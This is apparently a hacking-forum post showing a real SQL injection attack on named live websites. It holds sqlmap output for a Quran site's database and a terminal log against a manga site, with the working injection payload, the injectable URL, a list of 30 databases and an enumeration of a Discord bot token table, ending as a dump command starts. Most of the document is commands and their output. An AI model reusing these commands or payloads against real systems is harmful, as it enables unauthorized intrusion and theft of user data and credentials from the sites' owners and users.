| tafsir_ibn_abbas_en       |
| tafsir_jalalayn_en        |
| tafsir_jalalayn_id        |
| tafsir_mokhtasar_bn       |
| tafsir_mokhtasar_en       |
| tafsir_mokhtasar_id       |
| tafsir_mokhtasar_it       |
| tafsir_mokhtasar_zh       |
| tafsir_tabary             |
| tafsir_tahlili_id         |
| tafsir_wajiz_id           |
| tafsir_word               |
| tafsir_word_meaning       |
| tafsser                   |
| tags                      |
| tel_abdulraheemmoha       |
| tfs_ar_katheer            |
| tfs_ar_sa3dy              |
| tg_ayati                  |
| th_thai                   |
| topic_ayat                |
| topic_ayatold             |
| topics_name               |
| tr_anscription            |
| tr_arab                   |
| tr_diyanet                |
| tr_golpinarli             |
| tr_mokhtasar_islamhouse   |
| tr_transliteration        |
| tr_vakfi                  |
| transliteration           |
| tt_nugman                 |
| tur_alifikriyavu          |
| ug_saleh                  |
| ur_footnotes              |
| ur_jalandhry              |
| ur_maududi                |
| uz_mansour                |
| uz_sodik                  |
| uzb_muhammadsodikmu       |
| vi_rwwad                  |
| worddata                  |
| yor_shaykhaburahima       |
| zh_jian                   |
| zh_majian                 |
| zho_mazhonggang           |
| zho_muhammadmakin         |
+---------------------------+

[04:41:58] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
Database: surahq_forum
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| ahadith                   | 131826  |
| irab_word                 | 77432   |
| quranWords                | 77432   |
| tafsir_word               | 77432   |
| tafsir_word_meaning       | 77432   |
| ahadith_key               | 24738   |
| tafsser                   | 18708   |
| sahih_alhadith            | 16351   |
| topic_ayat                | 15054   |
| worddata                  | 10525   |
| topic_ayatold             | 7587    |
| tafsir_e3rab_quran        | 6237    |
| almulla                   | 6236    |
| am_sadiq                  | 6236    |
| ara_quran411              | 6236    |
| ara_quranphoneticst_la    | 6236    |
| ayat                      | 6236    |
| ayetler                   | 6236    |
| az_mammadaliyev           | 6236    |
| az_musayev                | 6236    |
| baghawy                   | 6236    |
| ber_mensur                | 6236    |
| bg_theophanov             | 6236    |
| bn_bengali                | 6236    |
| bn_hoque                  | 6236    |
| bs_korkut                 | 6236    |
| Burmese_ghazimohammadha   | 6236    |
| dan_vandetaal             | 6236    |
| de_bubenheim              | 6236    |
| de_khoury                 | 6236    |
| de_zaidan                 | 6236    |
| en_almuntakhab            | 6236    |
| en_hilali                 | 6236    |
| en_mubarakpuri            | 6236    |
| en_sahih                  | 6236    |
| en_transliteration        | 6236    |
| en_yusufali               | 6236    |
| es_garcia                 | 6236    |
| es_navio                  | 6236    |
| es_noor                   | 6236    |
| fa_ayati                  | 6236    |
| fa_khorramdel             | 6236    |
| fa_mokhtasar_islamhouse   | 6236    |
| fa_tagi                   | 6236    |
| fil_abdullatifeduar       | 6236    |
| fil_islamhouse            | 6236    |
| fr_hamidullah             | 6236    |
| fr_mokhtasar_islamhouse   | 6236    |
| fr_noor                   | 6236    |
| fr_rashid                 | 6236    |
| ful_rowadtranslatio       | 6236    |
| guj_rabilaalomari         | 6236    |
| ha_gumi                   | 6236    |
| hi_farooq                 | 6236    |
| hi_footnotes              | 6236    |
| hi_hindi                  | 6236    |
| id_indonesian             | 6236    |
| id_muntakhab              | 6236    |
| ind_muhammadquraish       | 6236    |
| islamveihsan              | 6236    |
| it_piccardo               | 6236    |
| ja_japanese               | 6236    |
| ja_jawa                   | 6236    |
| kaz_khalifaha2            | 6236    |
| kaz_khalifahaltaich       | 6236    |
| kaz_turk                  | 6236    |
| kir_shamsaldinhakim       | 6236    |
| ko_korean                 | 6236    |
| kor_hamidchoi             | 6236    |
| ku_asan                   | 6236    |
| ku_kurdish                | 6236    |
| ml_abdulhameed            | 6236    |
| ms_basmeih                | 6236    |
| nl_siregar                | 6236    |
| no_berg                   | 6236    |
| Oromoo                    | 6236    |
| pan_drmuhamadhabibb       | 6236    |
| pl_bielawskiego           | 6236    |
| ps_abdulwali              | 6236    |
| pt_elhayek                | 6236    |
| pt_helmy                  | 6236    |
| quran                     | 6236    |
| quran_ayat                | 6236    |
| quran_fanoos              | 6236    |
| quran_id                  | 6236    |
| ru_muntahab               | 6236    |
| ru_porokhova              | 6236    |
| sd_amroti                 | 6236    |
| si_sinhalese              | 6236    |
| so_abduh                  | 6236    |
| sorahqyat                 | 6236    |
| sq_nahi                   | 6236    |
| sv_bernstrom              | 6236    |
| sw_barwani                | 6236    |
| sw_barwani_footnotes      | 6236    |
| ta_tamil                  | 6236    |
| tafsir_e3rab_tafsircenter | 6236    |
| tafsir_hidayat            | 6236    |
| tafsir_ibn_abbas_en       | 6236    |
| tafsir_jalalayn_en        | 6236    |
| tafsir_jalalayn_id        | 6236    |
| tafsir_mokhtasar_bn       | 6236    |
| tafsir_mokhtasar_en       | 6236    |
| tafsir_mokhtasar_id       | 6236    |
| tafsir_mokhtasar_it       | 6236    |
| tafsir_mokhtasar_zh       | 6236    |
| tafsir_tabary             | 6236    |
| tafsir_tahlili_id         | 6236    |
| tafsir_wajiz_id           | 6236    |
| tags                      | 6236    |
| tel_abdulraheemmoha       | 6236    |
| tfs_ar_katheer            | 6236    |
| tfs_ar_sa3dy              | 6236    |
| tg_ayati                  | 6236    |
| th_thai                   | 6236    |
| tr_anscription            | 6236    |
| tr_arab                   | 6236    |
| tr_diyanet                | 6236    |
| tr_golpinarli             | 6236    |
| tr_mokhtasar_islamhouse   | 6236    |
| tr_transliteration        | 6236    |
| tr_vakfi                  | 6236    |
| transliteration           | 6236    |
| tt_nugman                 | 6236    |
| tur_alifikriyavu          | 6236    |
| ug_saleh                  | 6236    |
| ur_footnotes              | 6236    |
| ur_jalandhry              | 6236    |
| ur_maududi                | 6236    |
| uz_mansour                | 6236    |
| uz_sodik                  | 6236    |
| uzb_muhammadsodikmu       | 6236    |
| vi_rwwad                  | 6236    |
| yor_shaykhaburahima       | 6236    |
| zh_jian                   | 6236    |
| zh_majian                 | 6236    |
| zho_mazhonggang           | 6236    |
| zho_muhammadmakin         | 6236    |
| qaritelawat               | 3227    |
| quran_root                | 1918    |
| cities                    | 1428    |
| topics_name               | 1188    |
| HSN_AMMAR                 | 317     |
| HSN_Ar                    | 317     |
| HSN_CategoriesHSN_Ar      | 317     |
| AzkarFootNotes            | 301     |
| HSN_En                    | 257     |
| quran_recitation          | 168     |
| sorah                     | 114     |
| surah_content             | 114     |
| sureler                   | 114     |
| asma_husna                | 99      |
| qura_shabab               | 63      |
| languages                 | 55      |
| chapters                  | 30      |
| quran_general             | 2       |
| quran_contactus           | 1       |
+---------------------------+---------+

[04:42:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/surahquran.com'

[*] ending @ 04:42:43 /2025-09-14/

MrDark · 14.09.2025

Код:

Database: kmansin5s
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 910250  |
| chapter_views          | 702192  |
| chapters               | 170149  |
| user_log_reading       | 8932    |
| taxonomy_manga         | 8354    |
| mangas                 | 1898    |
| emoji                  | 846     |
| statistic              | 336     |
| user_reading_list      | 158     |
| reported               | 15      |
| user_avatar            | 1       |
+------------------------+---------+

Database: koma01com
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| taxonomy_manga         | 15406   |
| `user`                 | 10162   |
| ratings                | 4958    |
| mangas                 | 4477    |
| taxonomy               | 3101    |
| statistic              | 1096    |
| emoji                  | 846     |
| manga_comments         | 141     |
| `level`                | 100     |
| user_request           | 5       |
+------------------------+---------+

Database: sql_test_doctruy
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| mac_type               | 18      |
| mac_admin              | 1       |
| mac_comment            | 1       |
+------------------------+---------+

Database: backup_29_11_2022
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| user_reading_list      | 889     |
| emoji                  | 846     |
| taxonomy_manga         | 520     |
| `level`                | 100     |
| manga_comments         | 71      |
| statistic              | 48      |
| user_avatar            | 40      |
+------------------------+---------+

Database: mangaplus
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 425284  |
| chapter_data           | 28805   |
| emoji                  | 846     |
| `user`                 | 170     |
| mangas                 | 64      |
| user_avatar            | 38      |
| ratings                | 17      |
| manga_comments         | 6       |
+------------------------+---------+

Database: manhuaplus_xyz
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_data           | 14021   |
| chapters               | 14021   |
| taxonomy_manga         | 459     |
| statistic              | 150     |
| taxonomy               | 82      |
| mangas                 | 49      |
| user_log_reading       | 16      |
| user_avatar            | 1       |
+------------------------+---------+

Database: wp_test
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_options             | 175     |
| wp_usermeta            | 19      |
| wp_term_relationships  | 1       |
| wp_users               | 1       |
+------------------------+---------+

Database: mangasect
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 1112158 |
| chapter_views          | 826925  |
| log_views              | 59559   |
| taxonomy_manga         | 3755    |
| taxonomy               | 2637    |
| `user`                 | 2074    |
| reported               | 1347    |
| statistic              | 502     |
| `level`                | 100     |
| manga_comments         | 82      |
| user_request           | 3       |
+------------------------+---------+

Database: manhuaplus_org
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| user_log_reading       | 19664744 |
| user_reading_list      | 467031  |
| reported               | 79849   |
| log_views              | 78869   |
| `user`                 | 44859   |
| taxonomy_manga         | 16280   |
| manga_comments         | 15289   |
| taxonomy               | 14731   |
| statistic              | 850     |
| user_avatar_frame      | 46      |
+------------------------+---------+

Database: sys
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| sys_config             | 6       |
+------------------------+---------+

Database: mangakoma
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 1232939 |
| taxonomy_manga         | 1054    |
| user_reading_list      | 788     |
| mangas                 | 362     |
| reported               | 285     |
| `level`                | 100     |
| ratings                | 62      |
| user_avatar            | 28      |
+------------------------+---------+

Database: mangakoma-new
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 806569  |
| log_views              | 209944  |
| chapters               | 103246  |
| user_log_reading       | 59096   |
| taxonomy_manga         | 5932    |
| mangas                 | 1600    |
| taxonomy               | 903     |
| emoji                  | 846     |
| user_avatar            | 28      |
| manga_comments         | 5       |
+------------------------+---------+

Database: raw5s
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_data           | 80214   |
| log_views              | 41223   |
| taxonomy_manga         | 4961    |
| mangas                 | 1386    |
| emoji                  | 846     |
| `level`                | 100     |
| `user`                 | 8       |
+------------------------+---------+

Database: freemail
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| access_log             | 412     |
| mail                   | 100     |
+------------------------+---------+

Database: yymh
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| qiswl_admin_user       | 3       |
+------------------------+---------+

Database: bestmanhua
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_data           | 33336   |
| taxonomy_manga         | 11452   |
| mangas                 | 391     |
| `user`                 | 169     |
| reported               | 50      |
+------------------------+---------+

Database: mysql
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| help_topic             | 735     |
| global_priv            | 59      |
| help_category          | 44      |
| help_relation          | 36      |
+------------------------+---------+

Database: doctruyen5s_pane
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| google_font            | 1001    |
| countries              | 246     |
| languages_code         | 79      |
| app_settings           | 69      |
| right_navigation_icon  | 25      |
| native_social          | 14      |
| social                 | 9       |
| pages                  | 5       |
| tab                    | 5       |
| floating               | 3       |
| app_translations       | 2       |
| about                  | 1       |
| notification           | 1       |
| splash                 | 1       |
| useragent              | 1       |
| users                  | 1       |
+------------------------+---------+

Database: manga347
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 294326  |
| chapter_data           | 23824   |
| user_log_reading       | 19247   |
| statistic              | 932     |
| emoji                  | 846     |
| taxonomy_manga         | 131     |
| `level`                | 100     |
| user_avatar            | 56      |
| mangas                 | 45      |
| ratings                | 14      |
+------------------------+---------+

Database: doctruyen5s_pico
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_comments            | 1       |
| wp_term_relationships  | 1       |
+------------------------+---------+

Database: doctruyen5s_panel2
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| google_font            | 1001    |
| translations           | 341     |
| languages_code         | 79      |
| app_settings           | 69      |
| floating_translations  | 38      |
| app_translations       | 11      |
| languages              | 10      |
| settings               | 1       |
| useragent              | 1       |
+------------------------+---------+

Database: yaoitoondb
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_term_relationships  | 1638    |
| wp_manga_chapters_data | 576     |
| wp_options             | 485     |
| wp_term_taxonomy       | 428     |
| wp_revslider_css       | 109     |
| wp_termmeta            | 21      |
+------------------------+---------+

Database: mansinraw_com
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_options             | 199     |
| wp_term_relationships  | 117     |
+------------------------+---------+

Database: sql_manhuasect_c
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| wp_manga_chapters      | 7404    |
| wp_usermeta            | 4214    |
| wp_options             | 185     |
| wp_terms               | 116     |
+------------------------+---------+

Database: romanceplus
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapter_views          | 17083   |
| chapter_data           | 14342   |
| log_views              | 6974    |
| user_log_reading       | 505     |
| taxonomy               | 158     |
| mangas                 | 127     |
| `level`                | 100     |
| user_avatar            | 32      |
| reported               | 25      |
+------------------------+---------+

Database: sql_yaoitoon_com
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 18643513 |
| chapter_views          | 11083392 |
| chapter_data           | 158093  |
| chapters               | 158093  |
| log_views              | 133889  |
| user_reading_list      | 41687   |
| reported               | 5612    |
| user_avatar            | 997     |
| taxonomy               | 118     |
| `level`                | 100     |
+------------------------+---------+

Database: doctruyen5s
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| user_log_reading       | 540874  |
| user_reading_list      | 11141   |
| `user`                 | 5122    |
| log_list               | 3295    |
| mangas                 | 1369    |
| user_avatar            | 312     |
| ratings                | 293     |
| notification           | 209     |
| `level`                | 100     |
| user_request           | 7       |
| giftcard_type          | 4       |
+------------------------+---------+

Database: api_k6vn_org
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| `server`               | 80      |
| api_key                | 44      |
| pay_history            | 11      |
| `rank`                 | 5       |
+------------------------+---------+

Database: sql_mangakoma01_
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| log_list               | 19986   |
| chapters               | 13015   |
| log_views              | 7041    |
| `level`                | 100     |
| mangas                 | 98      |
| reported               | 4       |
| ratings                | 1       |
+------------------------+---------+

Database: manga_koma_net
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| chapters               | 25922   |
| emoji                  | 846     |
| mangas                 | 98      |
| `user`                 | 42      |
| ratings                | 27      |
| user_avatar            | 23      |
| user_reading_list      | 7       |
+------------------------+---------+

Код:

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2 --dbs --flush-session -                                                       -random-agent --batch --technique=E --threads=10 --dbms=mysql
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a                                                       ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra                                                       m

[*] starting @ 09:34:47 /2025-09-14/

[09:34:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)' from file '/root/myenv/lib/python                                                       3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:34:47] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap                                                        could be able to run properly
[09:34:47] [INFO] flushing session file
[09:34:47] [INFO] testing connection to the target URL
[09:34:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:34:49] [WARNING] reflective value(s) found and filtering out
[09:34:49] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[09:34:49] [INFO] testing for SQL injection on URI parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[09:34:49] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:35:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:35:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:35:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:35:35] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:35:46] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:35:57] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:36:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:36:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:30] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:42] [INFO] testing 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:36:42] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 532 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:36:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:36:44] [INFO] fetching database names
[09:36:44] [INFO] starting 10 threads
[09:36:44] [INFO] retrieved: 'information_schema'
[09:36:44] [INFO] retrieved: 'kmansin5s'
[09:36:44] [INFO] retrieved: 'mangasect'
[09:36:44] [INFO] retrieved: 'discord_bot'
[09:36:44] [INFO] retrieved: 'koma01com'
[09:36:44] [INFO] retrieved: 'mangaplus'
[09:36:44] [INFO] retrieved: 'wp_test'
[09:36:44] [INFO] retrieved: 'manhuaplus_xyz'
[09:36:44] [INFO] retrieved: 'backup_29_11_2022'
[09:36:44] [INFO] retrieved: 'manhuaplus_org'
[09:36:44] [INFO] retrieved: 'mangakoma'
[09:36:44] [INFO] retrieved: 'mangakoma-new'
[09:36:44] [INFO] retrieved: 'mysql'
[09:36:44] [INFO] retrieved: 'freemail'
[09:36:44] [INFO] retrieved: 'sys'
[09:36:44] [INFO] retrieved: 'yymh'
[09:36:45] [INFO] retrieved: 'doctruyen5s_pane'
[09:36:45] [INFO] retrieved: 'manga347'
[09:36:45] [INFO] retrieved: 'sql_manhuasect_c'
[09:36:45] [INFO] retrieved: 'performance_schema'
[09:36:45] [INFO] retrieved: 'doctruyen5s_panel2'
[09:36:45] [INFO] retrieved: 'yaoitoondb'
[09:36:45] [INFO] retrieved: 'doctruyen5s_pico'
[09:36:45] [INFO] retrieved: 'manga_koma_net'
[09:36:45] [INFO] retrieved: 'phpmyadmin'
[09:36:45] [INFO] retrieved: 'sql_mangakoma01_'
[09:36:45] [INFO] retrieved: 'doctruyen5s'
[09:36:45] [INFO] retrieved: 'sql_yaoitoon_com'
[09:36:45] [INFO] retrieved: 'api_k6vn_org'
[09:36:45] [INFO] retrieved: 'romanceplus'
available databases [30]:
[*] api_k6vn_org
[*] backup_29_11_2022
[*] discord_bot
[*] doctruyen5s
[*] doctruyen5s_pane
[*] doctruyen5s_panel2
[*] doctruyen5s_pico
[*] freemail
[*] information_schema
[*] kmansin5s
[*] koma01com
[*] manga347
[*] manga_koma_net
[*] mangakoma
[*] mangakoma-new
[*] mangaplus
[*] mangasect
[*] manhuaplus_org
[*] manhuaplus_xyz
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] romanceplus
[*] sql_mangakoma01_
[*] sql_manhuasect_c
[*] sql_yaoitoon_com
[*] sys
[*] wp_test
[*] yaoitoondb
[*] yymh

[09:36:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:36:45 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 --dbms=mysql --D discord_bot --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python sqlmap [options]

sqlmap: error: no such option: --D
(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 --dbms=mysql -D discord_bot --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a                                                       ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra                                                       m

[*] starting @ 09:38:00 /2025-09-14/

[09:38:00] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.                                                       5 (.NET CLR 3.5.30729)' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:00] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap                                                        could be able to run properly
[09:38:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:01] [INFO] testing MySQL
[09:38:02] [WARNING] reflective value(s) found and filtering out
[09:38:02] [WARNING] the back-end DBMS is not MySQL
[09:38:02] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

[*] ending @ 09:38:02 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 -D discord_bot --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a                                                       ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra                                                       m

[*] starting @ 09:38:19 /2025-09-14/

[09:38:19] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0' from file '/root/m                                                       yenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:19] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap                                                        could be able to run properly
[09:38:19] [INFO] resuming back-end DBMS 'mysql'
[09:38:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:38:20] [INFO] fetching tables for database: 'discord_bot'
[09:38:20] [INFO] starting 2 threads
[09:38:20] [INFO] retrieved: 'token'
[09:38:20] [INFO] retrieved: 'links'
Database: discord_bot
[2 tables]
+-------+
| links |
| token |
+-------+

[09:38:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:38:20 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 -D discord_bot --tables --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a                                                       ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra                                                       m

[*] starting @ 09:38:29 /2025-09-14/

[09:38:29] [INFO] fetched random HTTP User-Agent header value 'Opera/9.02 (Windows NT 5.1; U; ja)' from file '/root/myenv/lib/python3.12/site-pack                                                       ages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[09:38:29] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap                                                        could be able to run properly
[09:38:29] [INFO] resuming back-end DBMS 'mysql'
[09:38:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres= (SELECT 7516 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (EL                                                       T(7516=7516,1))),0x71626b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[09:38:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:38:30] [INFO] fetching tables for database: 'discord_bot'
[09:38:30] [INFO] starting 2 threads
[09:38:30] [INFO] resumed: 'token'
[09:38:30] [INFO] resumed: 'links'
Database: discord_bot
[2 tables]
+-------+
| links |
| token |
+-------+

[09:38:30] [INFO] fetching columns for table 'links' in database 'discord_bot'
[09:38:30] [INFO] starting 6 threads
[09:38:30] [INFO] retrieved: 'sv1'
[09:38:30] [INFO] retrieved: 'time'
[09:38:30] [INFO] retrieved: 'id'
[09:38:30] [INFO] retrieved: 'sv3'
[09:38:30] [INFO] retrieved: 'sv2'
[09:38:31] [INFO] retrieved: 'int(11)'
[09:38:31] [INFO] retrieved: 'varchar(236)'
[09:38:31] [INFO] retrieved: 'datetime'
[09:38:32] [INFO] retrieved: 'varchar(32)'
[09:38:32] [INFO] fetching columns for table 'token' in database 'discord_bot'
[09:38:32] [INFO] starting 3 threads
[09:38:32] [INFO] retrieved: 'token'
[09:38:32] [INFO] retrieved: 'expire'
[09:38:33] [INFO] retrieved: 'timestamp'
[09:38:33] [INFO] retrieved: 'varchar(32)'
[09:38:33] [INFO] retrieved: 'int(11)'
Database: discord_bot
Table: links
[5 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| time   | datetime     |
| id     | int(11)      |
| sv1    |
| sv2    |
| sv3    | varchar(236) |
+--------+--------------+

Database: discord_bot
Table: token
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| expire | timestamp   |
| token  | varchar(32) |
+--------+-------------+

[09:38:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/manhuaplus.org'

[*] ending @ 09:38:33 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://manhuaplus.org/filter/2/?chapter_count=0&genres=&notGenres=*" --level=3 --risk=2  --random-agent --batch                                                        --technique=E --threads=10 -D discord_bot --tables --columns --dump
        ___
       __H__
